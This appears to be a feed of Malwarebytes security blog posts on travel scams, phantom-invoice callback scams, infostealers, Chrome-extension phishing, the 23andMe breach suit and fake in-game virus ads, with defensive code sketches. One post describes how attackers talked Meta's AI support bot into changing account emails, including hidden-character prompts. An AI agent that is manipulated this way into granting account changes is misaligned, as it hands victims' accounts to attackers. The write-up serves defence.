While studies consistently show that cybersecurity is one of the AI applications people worry about most, they also see that AI is increasingly necessary to keep pace with modern threats. A 2025 study focusing on AI in cybersecurity found that the public widely recognizes the technical benefits of AI‑driven defenses (speed, scale, accuracy), while remaining concerned about privacy, bias, and job displacement in security operations.

That is why the AI debate in cybersecurity feels different from the debate in many other fields. People may be uneasy about AI, but they also understand that the threat landscape no longer moves at human speed. Attackers already use automation, scale, and increasingly AI‑assisted workflows, so defensive teams that refuse to adapt would simply be slower and less effective.

Our mission at Malwarebytes is twofold: reduce the risks created by AI, and use AI to prevent, detect, and respond to threats. We’ve been using machine learning in our security products for nearly two decades, developing proprietary detection systems that help identify malicious code and suspicious behavior at a scale and speed that would be impossible manually.

Coming soon: How AI is changing trust online

Malwarebytes recently surveyed 1,500 adults across the US, UK, Austria, Germany, and Switzerland about their experiences with AI. The findings reveal a growing uncertainty about what people can trust online, alongside increasing concern about scams, impersonation, and AI-generated deception.

Stay tuned for the full Malwarebytes report on how AI is reshaping trust, identity, and scams.

Use AI safely

If you use AI in a security context, keep your data hygiene strict. Don’t paste passwords, customer data, or sensitive incident details into public AI tools. Treat AI-generated outputs as untrusted until verified, especially when they touch code, logs, indicators, or policy decisions.

AI can be useful for summarizing information, identifying patterns, and producing first drafts, but keep a human in the loop for anything that affects access, containment, legal decisions, or public communications. Where possible, prefer enterprise or local deployments with logging, access control, and clear data-retention rules.

Also remember that AI can hallucinate confidently. In security work, that means every output needs validation against logs, documentation, source code, or other primary evidence before you act on it.

Categories: Malware Bytes

Travel scams are everywhere. Here’s how to avoid them

Thu, 06/04/2026 - 7:28am

Planning a holiday should be exciting, fun, and not a cybersecurity risk. But booking flights, hotels, and rental properties often means sharing sensitive personal and financial information across multiple platforms. Combined with frequent travel scams and recurring data breaches in the travel and hospitality sector, it creates plenty of opportunities for criminals.

This guide covers the most common risks when making travel reservations and explains how to avoid them. Save the adventure for your destination.

Travel bookings combine high-value payments with urgency and emotional decision-making. Attackers love that for several reasons:

  • Large upfront payments make scams profitable.
  • Booking confirmations often contain valuable personal data, such as names, travel dates, contact details, and sometimes passport information.
  • Travelers are more likely to act quickly and overlook red flags.
  • Travel and hospitality companies are frequent breach targets due to complex IT environments and third-party integrations.

Recent years have seen repeated breaches involving hotel chains, booking platforms, cruise operators, and airlines, exposing everything from email addresses to passport numbers.

Common travel-related scams

Fake booking websites

Attackers create convincing clones of airline, hotel, and travel booking websites, often promoted through online ads or SEO poisoning (manipulating search engine results). Victims enter payment details, receive fake confirmations, and only discover the fraud later.

Last year we uncovered a campaign using fake Booking.com websites that tricked visitors into infecting their own devices with a Remote Access Trojan (RAT).

Phishing messages about reservation problems

Emails, texts, or messaging app notifications may claim there’s a problem with your booking and urge you to click a link, open an attachment, or call a number. The scammers often impersonate legitimate travel brands and may include real stolen data from previous breaches.

Earlier this year, we wrote about a Booking.com breach that provided scammers with a lot of useful information that could make their messages appear more convincing.

Vacation rental fraud

Scammers post fake listings or hijack legitimate ones on rental platforms. They typically encourage off-platform communication or payments to avoid built-in protections.

In 2024, one of our researchers encountered exactly this type of scam. A supposedly legitimate Airbnb listing in Amsterdam turned out to be fake, and the scammer sent an email claiming to be from TripAdvisor in an attempt to collect payment details.

“Too good to be true” deals

Deep discounts on flights or accommodation are used to lure victims into paying for offers that don’t exist.

If a deal seems unusually generous, look for the catch. Be especially cautious when advertisers claim the offer will end very soon. Creating urgency is one of the oldest tricks in the scammer playbook.

Booking.com impersonation scams

Booking.com has become an increasingly popular brand for scammers to impersonate. According to our—anonymized—Scam Guard data, we’ve recently seen:

  • Fake cashback emails promising a €435 refund that lead to phishing websites
  • In-app messages requesting an additional reservation fee
  • Emails containing PDF attachments that require a “secure viewer,” which turns out to be malware
  • WhatsApp messages claiming credit card details are missing and directing users to phishing sites
  • Text messages linking to fake Booking.com pages and demanding card verification before a deadline

The number of scams impersonating Booking.com has been growing. Since the breach disclosed in April, Scam Guard data shows a 56% increase in Booking.com-related scams compared to the previous period, with weekly volume up consistently across five straight weeks.

How to book travel safely

There are a few simple things that can dramatically reduce your risk:

  • Use secure payment methods. Credit cards offer better fraud protection than debit cards or bank transfers. Never pay anyone asking for payment in cryptocurrencies or gift cards.
  • Stick to trusted platforms. Even though these are not guaranteed to be safe, using them is better than gambling on an unknown platform.
  • Don’t click on sponsored search results. I cannot say this often enough.
  • Verify the existence of the booked accommodation through other channels.
  • Treat requests to move communication or payment to another platform as suspicious.
  • Consider urgent language, unexpected attachments, and mismatched sender domains as red flags.
  • Downloads needed to open an attachment are not to be trusted. These downloads often turn out to be malware. To block and remove malware, use an up-to-date, real-time anti-malware solution.

Pro tip: Malwarebytes Browser Guard will block known phishing websites and can even recognize suspicious websites that are not in our database yet.

Categories: Malware Bytes

Meta’s AI support bot happily handed Instagram accounts to hackers

Thu, 06/04/2026 - 5:09am

Customer service chatbots have one job: get the user what they’re asking for without bothering a human. Meta’s new AI support assistant took that brief a little too seriously. Over the past few months, attackers have been opening support chats, telling the bot they were locked out of Instagram accounts they didn’t own, and walking away with the keys.

Over the weekend, Meta pushed an emergency patch after Instagram accounts belonging to the Obama White House (now dormant), beauty retailer Sephora, and a senior US Space Force official were taken over and briefly defaced with pro-Iranian imagery. Security researcher and former Meta employee Jane Manchun Wong was also hit.

How the trick worked

The attack was simple. Attackers worked out where the account owner lived (there are lists of account owners’ home cities online, or they could just research the target). Then they used a VPN to match the target account’s geographic region, which avoided raising flags with Instagram’s security systems.

Then they started a normal password reset and opened the support chat. They asked the AI bot providing support to change the email address on the account, and it did exactly that, sending a one-time code straight to the attacker’s inbox.

To do this, the chatbot appears to have been wired into Meta’s account management systems with permission to make account changes, but without being taught how to verify it was talking to the real account owner. Security people have a name for that: “confused deputy.” The term has been around since the 1980s.

In fairness to the confused bot, attackers were successful even if the enhanced security was triggered. They would apparently create video deepfakes of their targets using images that were harvested from—you guessed it—Instagram.

Meta hoisted on its own AI petard

Meta has been shedding headcount and pouring money into AI, and rolled out its AI-powered support assistant earlier this year to help handle account recovery and other support requests.

The downside is that the AI appears to have been given the ability to perform actions such as email changes and password resets without applying enough safeguards to confirm the user’s identity first.
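The confused-deputy problem described above comes down to where the authorization decision is made. The sketch below is an added example, not Meta's code or design: every name in it (`Session`, `ToolCall`, `authorize`, the action names, the 300-second step-up window) is a hypothetical chosen for illustration. It contrasts a dispatcher that acts on the bot's own privileges with one that decides from facts the platform's authentication layer established about the requester.

```python
from dataclasses import dataclass, field
from typing import Optional

SENSITIVE = {"change_email", "reset_password"}  # actions that hand over control (assumed names)
STEP_UP_MAX_AGE = 300                           # seconds a step-up proof stays valid (assumed)


@dataclass(frozen=True)
class Session:
    """Facts set by the platform's auth layer, never by anything typed in chat."""
    owner_of: Optional[str] = None      # account proven by login; None means anonymous
    step_up_at: Optional[float] = None  # when a code sent to an on-file contact was confirmed


@dataclass(frozen=True)
class ToolCall:
    """What the model asked for. It is built from the conversation, so it is untrusted."""
    action: str
    account: str
    args: dict = field(default_factory=dict)


def authorize(session: Session, call: ToolCall, now: float) -> tuple:
    """Decide from session facts only. Returns (allowed, reason)."""
    if call.action not in SENSITIVE:
        return True, "not sensitive"
    if session.owner_of is None or session.owner_of != call.account:
        return False, "requester has not proven control of this account"
    if session.step_up_at is None or now - session.step_up_at > STEP_UP_MAX_AGE:
        return False, "fresh step-up verification required"
    return True, "verified owner"


def apply_call(accounts: dict, call: ToolCall) -> None:
    """The privileged backend operation the bot has been granted."""
    if call.action == "change_email":
        accounts[call.account]["email"] = call.args["new_email"]


def naive_dispatch(accounts, session, call, now):
    """Confused deputy: the bot's own privilege is the only check."""
    apply_call(accounts, call)
    return True, "executed on the bot's authority"


def gated_dispatch(accounts, session, call, now):
    """The model may request anything; the gate decides on the requester's authority."""
    allowed, reason = authorize(session, call, now)
    if allowed:
        apply_call(accounts, call)
    return allowed, reason


def demo() -> dict:
    """Run the same email-change request through both dispatchers (constructed data)."""
    now = 1_000_000.0
    call = ToolCall("change_email", "victim_handle",
                    {"new_email": "new-address@example.test"})
    cases = [
        ("naive/anonymous", naive_dispatch, Session()),
        ("gated/anonymous", gated_dispatch, Session()),
        ("gated/stale", gated_dispatch,
         Session(owner_of="victim_handle", step_up_at=now - 3600)),
        ("gated/owner", gated_dispatch,
         Session(owner_of="victim_handle", step_up_at=now - 60)),
    ]
    results = {}
    for name, dispatch, session in cases:
        accounts = {"victim_handle": {"email": "owner@example.test"}}
        allowed, _reason = dispatch(accounts, session, call, now)
        results[name] = (allowed, accounts["victim_handle"]["email"])
    return results


if __name__ == "__main__":
    for name, outcome in demo().items():
        print(f"{name:16} allowed={outcome[0]!s:5} email_on_file={outcome[1]}")
```

The gate never reads the conversation, so no amount of persuasive chat text changes its answer. Only a login and a recent proof through a contact already on file do.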

Meta communications executive Andy Stone said on X that the issue was resolved and impacted accounts were being secured. The company has not disclosed how many accounts were affected.

What actually worked

Why would anyone want to hack an Instagram account anyway? Revenge can be a driver, but more often than not, financial gain is the goal. Hijackers have blackmailed businesses that rely on those accounts for marketing.

Attackers using this technique have also been spotted targeting “OG” accounts with short or highly desirable usernames. If you joined Instagram early and registered a memorable handle, it can be worth thousands of dollars on underground markets.

What can you do to protect yourself?

A perennial piece of advice still holds: turn on multi-factor authentication (MFA). According to veteran cybersecurity reporter Brian Krebs, the attack failed against accounts that had MFA enabled, including those using SMS codes.

That doesn’t make MFA perfect, but it adds an important layer of protection.

So the practical advice is unglamorous:

  • Open Instagram’s Settings
  • Navigate to your Meta Accounts Center
  • Turn on Two-factor authentication. An authenticator app is better than SMS, but either is better than nothing.

Do it now, because this might not yet be over. TheCyberSecGuru reports that another attack is circulating, this time using an Android emulator called BlueStacks running a modified version of Instagram to send new prompts with hidden characters designed to manipulate the AI.

Expect more snafus from “helpful” bots

This won’t be the last attack against AI chatbots. As more companies use AI to reduce customer support costs, their attack surface will grow, and they’ll make plenty of mistakes as they try to balance security and functionality.

The Meta exploit is patched, but the confused deputy concept is not. And there’s nothing quite as damaging as a confused AI with the keys to your digital life.

Scammers don’t need to hack you. They just need you to click once. 

Malwarebytes Identity Theft Protection catches suspicious activity before it becomes a problem.

Categories: Malware Bytes

We found this fake-invoice campaign while scammers were still building it

Wed, 06/03/2026 - 2:05pm

A new batch of fake payment invoices is being staged right now, and we caught the campaign while it was still being put together. The emails impersonate PayPal, Amazon, Geek Squad, and others, and they all share one goal: to scare you into calling a phone number where a fake “support agent” is waiting.

What makes this wave unusual is that some of the templates we recovered still contained blank fields where the phone number and price should have been, while others were already complete and in circulation. We caught the campaign mid-rollout.

What’s the scam?

If you receive an email that looks like a receipt—“Your subscription renewed for $349,” “You sent a payment of $598.96”—and it tells you to call a number to cancel or dispute the charge, stop.

There is no charge. The email exists to get you on the phone with a scammer who will then try to talk you into handing over remote access to your computer, your card details, or a “refund” that somehow requires you to send them money.

This particular flavor is called a “phantom invoice” or “refund” scam, and the trick is psychological, not technical. That’s why these emails can often slip past spam filters: there’s often no malicious attachment or link for security systems to analyze. The scam is in the phone number you’re urged to call.

If you didn’t make the purchase, there’s no need to call the number in the email to cancel it. Real companies don’t pressure customers into resolving unexpected charges through unsolicited phone numbers.

The goal is simple: create enough concern to get you to call. You see a significant charge you don’t recognize, say $499, and your first instinct is to stop it. The invoice helpfully provides a number to call “if this wasn’t you.” So you call, and now you’re talking to the scammer.

From there, the conversation usually leads to one of a few outcomes. They may ask you to install software so they can “fix” the charge, giving them access to your computer. They may ask for your card or bank details to “process the refund.” Or they may “accidentally” refund too much and ask you to send the difference back, usually by gift card or bank transfer.

The invoice is just the bait, while the phone call is the trap.

These emails are convincing, and some are already reaching inboxes. The good news is that simply receiving one doesn’t put you at risk. The scam only works if it succeeds in getting you to call the number provided. If you recognize the message as fraudulent and delete it, the attack stops there.

If you did call the number and followed instructions from a scammer, run a virus scan and check your bank accounts. Change your critical passwords, enable multi-factor authentication (MFA), and make sure your security software is up to date.

How we caught it half-built

Most scam investigations start after the damage is done. This one was different. We came across a cluster of nearly identical invoice templates that were clearly part of the same kit, and several of them were incomplete.

Where a finished scam email would show a phone number, some of these showed the literal text #TFN# instead, which is just a placeholder. (“TFN” is the scammers’ shorthand for toll-free number, the callback line they route victims to.) Others left the price as #PRICE#, the date as #DATE#, and the recipient as #EMAIL#. These are merge fields—the blanks a bulk-sending tool fills in automatically before a campaign goes out.

Finding those placeholders still in place told us that the operation was still being assembled. Some templates were still half-finished, while others were already complete and carrying live callback numbers. We’d caught the campaign mid-rollout, between being built and fully launched.
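The two states described above, half-built templates with merge fields still in place and finished lures carrying a callback number, can be told apart mechanically. The following is an added example for mail triage, not Malwarebytes' detection logic: the regular expressions, the `triage` function, the verdict names, and the three sample messages are all constructed here, and only the `#TFN#`, `#PRICE#`, `#DATE#`, and `#EMAIL#` field names and the brand list come from the article.

```python
import re

# Merge fields of the #NAME# form; the article names #TFN#, #PRICE#, #DATE#, #EMAIL#.
MERGE_FIELD = re.compile(r"#[A-Z][A-Z0-9_]{1,15}#")
# North American phone formats: 800-555-0142, (800) 555-0142, +1 800 555 0142
PHONE = re.compile(r"(?<!\d)(?:\+?1[\s.-]?)?\(?\d{3}\)?[\s.-]?\d{3}[\s.-]?\d{4}(?!\d)")
AMOUNT = re.compile(r"\$\s?\d+(?:,\d{3})*(?:\.\d{2})?")
BRANDS = ("paypal", "amazon", "geek squad")
URGENCY = re.compile(r"within \d+ hours|act immediately|cancel (?:now|before)", re.I)
CALL_VERB = re.compile(r"\b(?:call|contact|dial)\b", re.I)


def triage(body: str) -> dict:
    """Collect the signals the article describes and return them with a verdict."""
    signals = {
        "unfilled_fields": sorted(set(MERGE_FIELD.findall(body))),
        "phones": PHONE.findall(body),
        "amounts": AMOUNT.findall(body),
        "brands": [b for b in BRANDS if b in body.lower()],
        "urgency": bool(URGENCY.search(body)),
        "call_to_action": bool(CALL_VERB.search(body)),
    }
    if signals["unfilled_fields"]:
        # Placeholders survived the bulk-sending tool: a kit that is still being built.
        verdict = "unfinished_template"
    elif (signals["phones"] and signals["amounts"]
          and signals["brands"] and signals["call_to_action"]):
        # Brand + charge + "call this number": the finished phantom-invoice lure.
        verdict = "callback_lure"
    else:
        verdict = "no_match"
    signals["verdict"] = verdict
    return signals


# Constructed sample messages (not taken from the campaign).
TEMPLATE = (
    "PayPal Invoice\nDate: #DATE#\nTo: #EMAIL#\n"
    "You sent a payment of #PRICE# to Amazon.\n"
    "If this wasn't you, call #TFN# within 12 hours."
)
LIVE = (
    "Geek Squad: Your subscription renewed for $349.00. "
    "To cancel, call (800) 555-0142 within 12 hours."
)
BENIGN = "Amazon order confirmation. Total: $24.99. View your order in Your Account."

if __name__ == "__main__":
    for name, body in (("template", TEMPLATE), ("live", LIVE), ("benign", BENIGN)):
        result = triage(body)
        print(name, result["verdict"], result["unfilled_fields"] or result["phones"])
```

A `callback_lure` verdict is a reason to quarantine or banner the message, not proof of fraud. A legitimate receipt that prints a support number next to a total matches the same pattern.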

Why these invoices look believable

The scammers use familiar brands such as PayPal, Amazon, and Geek Squad. They’re companies people expect to receive receipts and renewal notices from, which lowers suspicion.

The charges are also carefully chosen. Amounts in the few-hundred-dollar range are large enough to cause concern but still seem plausible as a subscription renewal or online purchase.

Many messages add urgency, telling recipients to call quickly to dispute or cancel the charge. This pressure is designed to stop people from verifying the transaction independently.

Some invoices even combine trusted brands, such as claiming a payment was sent through PayPal to Amazon. Referencing multiple well-known companies makes the message appear more credible.

How to spot a fake invoice

The good news is that these scams share warning signs. Once you know what to look for, they get a lot easier to catch. Watch for any of these:

  • A charge you don’t remember making. If you don’t recognize the charge, verify it independently through your account or bank. If there’s no record of it, the invoice is likely a lure designed to get you to call.
  • A ticking clock. “Call within 12 hours,” “cancel before it renews,” or “act immediately” provide fake urgency designed to stop you thinking. Real billing problems can wait while you check.
  • Brands you trust, used as cover. The more familiar the logo, the less carefully people read. Scammers borrow trust they didn’t earn.
  • Odd details that don’t quite fit. A PayPal email “from” Amazon, a stray address that belongs to no one, or slightly off wording. Trust the small things that feel wrong.
  • Pressure to keep you on the phone. Once you call, a real company would never stop you from hanging up to verify, but a scammer will.

If even one of these is present, treat the whole message as suspicious.

Remember the single rule that defeats this entire scam: A genuine company will never rush you onto a call to undo a payment you never made. If you’re not sure whether a charge is real, close the email and check your account the normal way: by typing the company’s website into your browser yourself, or calling the number on the back of your bank card.

Pro tip: Malwarebytes Scam Guard can help spot scams like these and guide you in what to do next, while Browser Guard will block you from accessing scam websites.

What to do if one of these lands in your inbox

If you receive a suspicious invoice like the ones described here, take a few simple precautions:

  • Don’t call the number. That’s the core of the scam. Legitimate refunds or cancellations don’t require you to call a number from an unsolicited receipt.
  • Don’t reply or click anything. Treat the message as suspicious, even if it looks legitimate.
  • Verify charges independently. If you’re concerned a charge might be real, log in directly to PayPal, your bank, or the retailer by typing the address yourself and reviewing your transaction history.
  • Report it. Forward suspected phishing emails to the impersonated company’s abuse address and, in the US, report them to the FTC at reportfraud.ftc.gov. Reporting helps disrupt scam operations.
  • If you already called, end the conversation. Don’t install any software they recommend. If you granted remote access or shared payment information, contact your bank immediately and run a trusted security scan on your device.
  • Be wary of urgency. Phrases like “within 12 hours” or “cancel now” are designed to pressure you into acting before you think. Take the time to verify the claim independently.

Scammers are increasingly shifting to tactics that software can’t easily inspect. A phone number in an email is difficult for security tools to evaluate, and the actual scam happens over a phone call instead of through a malicious link or attachment.

That’s why finding this campaign during rollout matters. Instead of seeing the damage afterward, we got a look at the preparation: unfinished templates, incomplete details, and the scam kit before it was fully deployed.

The best defense is simple: if an unexpected invoice tells you to call a number immediately, stop and verify the charge independently first.

Indicators of compromise

Domains

invoicepdfin[.]xyz

invoicepdfus[.]xyz

invoicepdfusa[.]xyz

invoicerep[.]xyz

invoicestatement[.]xyz

invoicestm[.]xyz

Callback numbers

804-392-2793

801-640-8589

Categories: Malware Bytes

Keep getting calls from questionable numbers? Meet Scam Number Check

Wed, 06/03/2026 - 8:16am

Have you ever gotten a phone call and had a gut feeling that those random digits looked extra suspicious? It happens to millions of people every day. While many people have trained themselves to ignore such calls, they still pose a threat across the US. In fact, scammers stole more than $21 billion from Americans last year, according to the latest IC3 report.

That’s why we created Scam Number Check.

Now, instead of risking a call with a scammer, you can look up a number and get a clear answer in seconds.

How to use Scam Number Check

We know scam calls happen every day, and they can cost victims a lot of money. So we designed Scam Number Check to be really simple to use. It’s free, private, and instant.

Here’s how:

  • Go to Malwarebytes’ Scam Number Check and enter the phone number.
  • If the number looks suspicious, you can choose whether to block or report it. Remember, reporting suspicious numbers helps protect others.

Understanding the results

Scam Number Check can provide one of three verdicts when you check a phone number. Here’s what each means and how you should proceed:

  • Do not trust this number. Multiple people have flagged this number as a scam. Don’t call back, don’t share personal info, and don’t send money if they ask.
  • This number seems safe. Based on available data, this number has not been associated with suspicious activity. It is our recommendation that you proceed with caution in this case.
  • We don’t have enough info. No information is available in the threat intelligence database. This doesn’t mean it’s safe, so proceed with caution.

Why it matters

Scammers like to pile on the pressure and create fake urgency so you don’t have time to think. If you don’t recognize a number, let it go to voicemail first. Then check the number with Scam Number Check to see if it’s been linked to scams or suspicious activity. This simple extra step might help you avoid sharing personal information, sending money, or falling for impersonation scams.

Scams are getting harder to spot every day. By making Malwarebytes even better at catching threats, we’re helping you stay one step ahead of scammers and cybercriminals.

Categories: Malware Bytes

Infostealers are becoming the go-to phishing payload

Wed, 06/03/2026 - 4:59am

Phishing has changed. Slowly but surely, cybercriminals are turning to infostealers instead.

Traditional phishing hasn’t gone away. Far from it. But many attackers are no longer focused solely on tricking victims into entering usernames and passwords on fake login pages. Instead, they are using infostealers to quietly collect passwords, cookies, browser data, and other sensitive information from infected devices.

This approach is attractive because it scales well and reduces friction. Instead of relying on a victim to type credentials into a fake site, the malware can harvest logins already saved in browsers, session tokens, autofill data, cryptocurrency wallet details, and even files that contain useful information.

This makes the attack chain less visible. A traditional phishing email often leaves obvious clues: a suspicious link, a fake login page, or a strange attachment. Infostealers are different. They can arrive through malicious online ads (malvertising), cracked software, fake browser updates, game cheats, or dubious download sites, and once installed, they work in the background, stealing whatever the victim’s device has in store.

Part of this shift could be due to the widespread adoption of multi-factor authentication (MFA). By stealing session cookies, cybercriminals can bypass MFA, so they can access accounts without needing a password or authentication code.

Another factor is the rise of the malware-as-a-service (MaaS) ecosystem. Infostealers are cheap to deploy, easy to scale, and highly profitable. Rather than building a full attack chain themselves, many criminals buy access to ready-made stealer kits, loaders, or initial access services from underground vendors. This lowers the barrier to entry and allows less-skilled attackers to run credential theft operations.

In many cases, infostealers are just the first stage of a larger criminal operation. The stolen data is collected, packaged, and sold to other criminals interested in the harvested information. These buyers may specialize in fraud, account takeover, business email compromise, or ransomware. A single infected machine can generate multiple revenue streams: credentials for one buyer, session cookies for another, and corporate access or wallet data for a third.

That division of labor is one reason infostealers have become so persistent. Operators can update their code, rotate infrastructure, and launch new campaigns with minimal effort, while affiliates handle distribution through phishing, malvertising, fake downloads, or social media lures.

How to stay safe

Because infostealers commonly arrive through malvertising, fake browser updates, and one-click downloads, it’s worth treating ads and pop-ups with healthy skepticism. My personal tip: Never click on sponsored ads. Instead, visit official websites directly and download software only from trusted sources such as official vendor sites or app stores.

Another increasingly popular technique is ClickFix, a social engineering attack that tricks users into infecting their own devices. Never run commands or scripts copied from websites, emails, or messages unless you trust the source and understand the action’s purpose. If a website tells you to execute a command or perform a technical action, check official documentation or contact support before proceeding.

Pirated software, game cheats, and cracked tools remain some of the most common delivery methods for infostealers. These downloads often come bundled with malware that installs alongside the software you intended to get. The same caution applies to many browser extensions and add-ons that promise extra features or convenience. Stick to extensions from reputable developers, check reviews and permissions carefully, and avoid installing any add-on that asks for more access than it plausibly needs.

Phishing emails are still a major threat, but many can be spotted if you slow down and verify before clicking. Even if an email looks like it comes from a trusted brand, treat unsolicited attachments and links with caution, especially when they urge you to open a file, install something urgently, or fix a billing issue. If you’re unsure, check the sender address, look for typos or odd phrasing, and confirm the request through a separate channel such as the company’s official website rather than the link in the email.

Categories: Malware Bytes

These convincing copyright notices are designed to steal Google logins

Tue, 06/02/2026 - 2:24pm

A new scam is targeting people who publish Chrome extensions.

The scam arrives as an official-looking “copyright removal request” claiming your extension is about to be removed from the Chrome Web Store and that you have 48 hours to appeal.

It even looks personalized. After you enter your extension’s ID to “verify” it, the page pulls in your extension’s real name and icon. But it’s all part of a phishing attack designed to steal your Google username and password.

If attackers gain access to a developer account, they may be able to take over the extension, access developer resources, or potentially push malicious updates to users.

What’s actually going on

If you’ve published a Chrome extension, you might encounter a page that looks like an official Google notice warning that your extension is being removed for copyright infringement.

The page asks you to enter your extension ID, then displays your real extension details alongside a complaint number and countdown clock. It pressures you to sign in with Google to file an appeal before time runs out.

None of it is real. The page is not operated by Google. The complaint, deadline, and countdown are fabricated. The goal is to trick you into entering your Google username and password into a fake sign-in window controlled by the scammer.

The most important rule to remember: Genuine warnings about your extension appear in your Chrome Web Store developer dashboard, not on a third-party website.

Why scammers want developer accounts

Chrome extensions have access to users’ browsers, and they can be updated automatically.

If attackers gain control of a developer account, they may be able to modify an extension, access developer resources, or potentially distribute malicious updates to existing users.

That’s what makes developer accounts such attractive targets, and why scams like these are prevalent.

What the scam looks like

The page is hosted on a domain that has nothing to do with Google. In the version we analyzed, the site used the address dmca-chrome-extensions[.]click.

Despite that, it uses Google’s branding and presents itself as a “Chrome Web Store Developer Policy Center.”

The page first asks for the link or ID of your extension. That seems harmless, which is exactly why it works.

It uses your own extension to look convincing

After you enter your extension ID, the page briefly displays a “Looking up extension…” message and then builds a fake takedown notice around your real extension.

When we tested the scam with Malwarebytes Browser Guard, it displayed our genuine extension name, icon, and Chrome Web Store listing alongside the fake complaint.

The site is simply pulling publicly available information from your extension’s Chrome Web Store page. Anyone can see that information. The scammers use it to make the fake notice appear legitimate.

Everything else is invented.

The complaint number, “date received,” 48-hour deadline, countdown timer, and timeline of events are generated by the scam page itself.

The countdown is there to rush you

A red warning banner claims your extension will be permanently removed unless you act within 48 hours, and a clock counts down by the second. The whole layout pushes you toward one button: sign in with Google to “verify your identity” and file your appeal. 

The urgency is designed to create pressure so you react before taking the time to verify the claim.

The fake sign-in window

When you click “Continue to verification,” a Google sign-in window appears with a title bar, padlock, and address showing accounts.google.com.

It looks authentic, but it isn’t.

The “window” is actually part of the web page itself. The padlock and address are just graphics designed to look like a real browser window.

The scammers even tailor the appearance to match your operating system, showing Mac-style windows on macOS and Windows-style windows on Windows devices.

Anything typed into this fake sign-in form is sent directly to the scammers.

One giveaway is that the window cannot leave the browser page. Try dragging it to the edge of your screen and it stops at the browser border. Minimize the browser and it disappears as well.

Most importantly, your browser’s real address bar still shows the scam site’s address, not Google’s.

How to stay safe

The good news is that a few simple habits defeat this scam.

  • Don’t trust the link. If you receive a warning about your extension, go directly to your Chrome Web Store developer dashboard and check there.
  • Be suspicious of urgency. Legitimate policy processes don’t rely on countdown clocks to force immediate action.
  • Check the address bar. A real Google sign-in page appears at accounts.google.com in your browser’s actual address bar.
  • Test the window. If a sign-in window can’t be dragged outside the browser or disappears when the browser is minimized, it’s probably fake.
  • Turn on stronger sign-in protection. Passkeys and hardware security keys make stolen passwords far less useful to attackers.
  • Use security software with phishing and web protection. Our Browser Guard, which is also part of Malwarebytes Premium, can help block malicious websites and phishing pages before you enter sensitive information.

This isn’t a crude phishing page. It uses your real extension details, mimics Google’s branding, and creates a convincing sense of urgency.

If you receive a warning about your extension, don’t follow the link and don’t race the countdown. Go directly to your Chrome Web Store developer dashboard and verify the claim there.

When in doubt, close the tab.

If you already entered your details

Act quickly.

  • Change your Google password immediately from a trusted device.
  • Sign out of all active sessions in your Google account security settings.
  • Review connected apps and devices for anything unfamiliar.
  • Turn on two-step verification, preferably using a passkey or security key.
  • Check your Chrome Web Store listings for changes, uploads, or new versions you didn’t publish.

Indicators of Compromise (IOCs)

Domain

dmca-chrome-extensions[.]click

Categories: Malware Bytes

23andMe exposed genetic information of millions, lawsuit says

Tue, 06/02/2026 - 5:53am

California has sued the former shell of DNA testing company 23andMe over alleged security failures and misleading statements surrounding its 2023 data breach.

On May 27, 2026, Attorney General Rob Bonta filed suit in San Francisco Superior Court against Chrome Holding Co., the company now handling 23andMe’s remaining assets following its bankruptcy.

California’s complaint accuses 23andMe of failing to implement reasonable security measures to protect sensitive data and alleges violations of several state privacy and consumer protection laws. It also accuses the company of making misleading statements about its security practices.

The 2023 breach used old-school credential-stuffing tactics against 23andMe’s login page. Attackers operated inside the systems for roughly five months without anyone noticing. The direct compromise was modest, affecting about 14,000 accounts, but that was all the attackers needed to steal the data of just under seven million customers.

The intruders pivoted from those accounts through DNA Relatives, the platform’s headline feature, which enabled people to determine who they were connected with through DNA similarity. The lawsuit alleges a critical coding error in that feature enabled the perpetrators to scrape data from millions of other users connected by biological kinship.

The victim-blaming defense became evidence

After the breach went public, 23andMe sent victims’ legal representatives a letter blaming users for reusing passwords from sites that had been compromised earlier. The exposed data, the company suggested, had been shared of the users’ own free will and would not cause “pecuniary harm.”

The harms stemming from genetic data theft extend far beyond financial losses, however. The genetic information that was stolen enabled thieves to determine an individual’s genetic origins.

The data was reportedly offered for sale on the dark web with this information as a selling point, enabling sellers to offer records on Asian American Pacific Islander (AAPI) or Jewish customers, for example. Bonta’s office pointed out that antisemitic violence was on the rise at the time.

In spite of the letter’s attempt to blame users, only about 14,000 accounts were directly compromised through password reuse. The rest of the data was allegedly exposed through 23andMe’s own product. According to the complaint, the coding error in DNA Relatives exposed the data of anyone who had opted into the service, not just those linked to the 14,000 compromised accounts.

Can the state recover damages?

California is seeking statutory penalties ranging from $1,000 to $7,500 per violation. With 855,541 Californians among the affected users, the costs could mount up quickly.

The question is how much of it the state will collect if it wins its case. 23andMe filed for Chapter 11 bankruptcy in March 2025, then sold most of its assets, including the genomic data of more than 15 million customers, to TTAM Research Institute, a nonprofit founded by former 23andMe CEO Anne Wojcicki. California and several other states opposed the sale on Genetic Information Privacy Act grounds, but a federal bankruptcy judge approved it. The states are now appealing that decision.

Chrome Holding Co., the corporate shell that remains of 23andMe, received $305 million from that sale. But others have already been picking over what’s left.

Other regulators have already had their turn. The UK Information Commissioner’s Office fined 23andMe £2.31 million in June last year following a joint investigation with the Privacy Commissioner of Canada. A federal court initially approved a $30 million class-action settlement covering most US customer claims. That settlement later grew to $50 million and received final approval in January 2026.

What customers can do

If you tested with 23andMe, the standard breach hygiene still applies. Reset any password you reused on other sites and turn on multi-factor authentication wherever it’s offered. Credential stuffing only works on usernames and passwords that have already been exposed elsewhere. Also watch for phishing attacks that name-drop 23andMe or the breach itself. And maybe weigh the benefits of using DNA testing services against the security risks.

Because there’s one part of this that no fine and no settlement can solve: stolen genetic data sold on the dark web cannot be taken back. Passwords can be changed. DNA can’t.

Categories: Malware Bytes

Fake virus alerts are invading mobile games

Tue, 06/02/2026 - 5:03am

Sometimes it happens. You’re happily playing a game on your phone or laptop when suddenly alarms pop up out of nowhere:

“Your device is infected!”

“Your iCloud is full!”

“Your account is restricted for watching porn!”

Some games can be played for free if you agree to watch ads, and in others you can get extra lives, perks, or boosters by watching ads. That’s fine, as long as you’re given a choice and the ads are legitimate.

Unfortunately, cybercriminals sometimes manage to buy advertising space and use it to defraud gamers.

Let’s look at some examples.

The iCloud storage scam, or its OneDrive equivalent, is a well-known and long-running scam that claims you need to expand your storage or all your files will be deleted. The websites these messages link to come in many forms, but they all ask for personal and payment details to complete the upgrade.

“Your account has been restricted.
We have detected that your device has been hacked after visiting adult websites.
Solution:
1:Click the “OK” button below;

2:You will be redirected to App Store;

3:Install and open the app, then run the cleanup program.”

This ad is a scam and uses a classic scare tactic. It falsely claims your device has been hacked and tries to pressure you into clicking “OK” and installing a cleanup app.

